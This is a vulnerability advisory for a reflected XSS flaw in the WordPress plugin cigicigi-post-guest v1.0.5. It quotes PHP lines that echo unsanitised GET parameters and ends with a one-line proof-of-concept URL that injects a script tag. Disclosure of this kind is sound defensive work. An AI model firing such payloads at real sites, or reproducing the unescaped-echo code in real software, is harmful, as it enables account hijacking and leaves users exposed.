Advisory #: 463
Title: Reflected XSS in wordpress plugin cigicigi-post-guest v1.0.5
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/cigicigi-post-guest
Downloads: 4535
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: cigicigi-post-guest
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./cigicigi-post-guest/cigicigi_post_guest.php: 580: <a class="next-page" href="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $s; ?>&do=<?php echo $_GET['do']; ?>"><?php echo $s; ?></a> 642: <a class="next-page" href="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $s; ?>&do=<?php echo $_GET['do']; ?>"><?php echo $s; ?></a> 663: <input type="button" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>"> 664: <input type="button" value="<?php _e('Edit'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>&do=edit&id=<?php echo $single_cigi_post_sorgu[0]->ID; ?>"> 665: <input type="button" class="cigicigi_delete_button" value="<?php _e('Delete'); ?>" onclick="delete_confirm('admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>&do=delete&id=<?php echo $single_cigi_post_sorgu[0]->ID; ?>')"> 666: <input type="button" class="cigicigi_publish_button" value="<?php _e('Publish'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>&do=publish&id=<?php echo $single_cigi_post_sorgu[0]->ID; ?>"> 700: <form method="POST" action="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>&do=edit&id=<?php echo $_GET['id']; ?>" id="cigicigi_post_guest_form" enctype="multipart/form-data"> 751: <input type="button" class="cigicigi_post_guest_submit" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>"> 773: <input type="button" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>"> 816: <input type="button" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>"> 821: <input type="button" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>"> 827: <input type="button" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>"> 859: <input type="button" value="<< <?php _e('Back', 'cigicigi-post-guest'); ?>" onclick=parent.location="admin.php?page=cigicigi_post_guest_posts&sayfa=<?php echo $_GET['sayfa']; ?>"> The variable do sayfa and id appear to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./cigicigi-post-guest/cigicigi_post_guest.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/cigicigi-post-guest/cigicigi_post_guest.php?do=<script>alert(1);</script>